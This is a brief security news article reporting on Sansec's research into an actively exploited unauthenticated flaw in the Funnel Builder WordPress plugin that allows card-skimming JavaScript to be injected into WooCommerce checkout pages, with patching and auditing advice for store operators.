Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

A critical vulnerability in the Funnel Builder WordPress plugin is actively being exploited to inject malicious JavaScript into WooCommerce checkout pages, targeting payment card data, according to research published by Sansec this week.

The flaw allows attackers to modify checkout workflows without authentication, enabling them to inject skimming code directly into payment forms. Threat actors weaponize this vulnerability to harvest customer payment information as transactions process. The vulnerability currently lacks an official CVE identifier, indicating the issue is either very recent or still being coordinated between Sansec and WordPress plugin maintainers.

WooCommerce stores using the Funnel Builder plugin face immediate risk. Attackers can inject persistent JavaScript into checkout pages, meaning every customer attempting to purchase sees the malicious code. Compromised payment data flows directly to attacker-controlled infrastructure, bypassing legitimate payment processors. This approach avoids triggering traditional fraud detection because transactions proceed through legitimate channels with stolen credentials.

The active exploitation pattern suggests this vulnerability is not theoretical. Real e-commerce sites using this plugin have likely already been compromised. Attackers monitor plugin vulnerabilities continuously, often developing exploits before official patches ship.

Store operators should immediately audit their Funnel Builder installations and update to patched versions as they become available. Sansec recommends customers review recent transaction logs for signs of unauthorized payment attempts or chargebacks. Payment Card Industry compliance requirements demand notification of customers if card data potentially leaked.

This incident reflects a broader threat targeting WordPress plugins with built-in payment functionality. E-commerce platforms running outdated or unpatched plugins remain soft targets. Plugin developers should implement authenticated access controls for critical functions, and site administrators should maintain aggressive patch management practices. Until patches release, store owners should consider temporarily disabling the Funnel Builder plugin or restricting checkout access to known users only.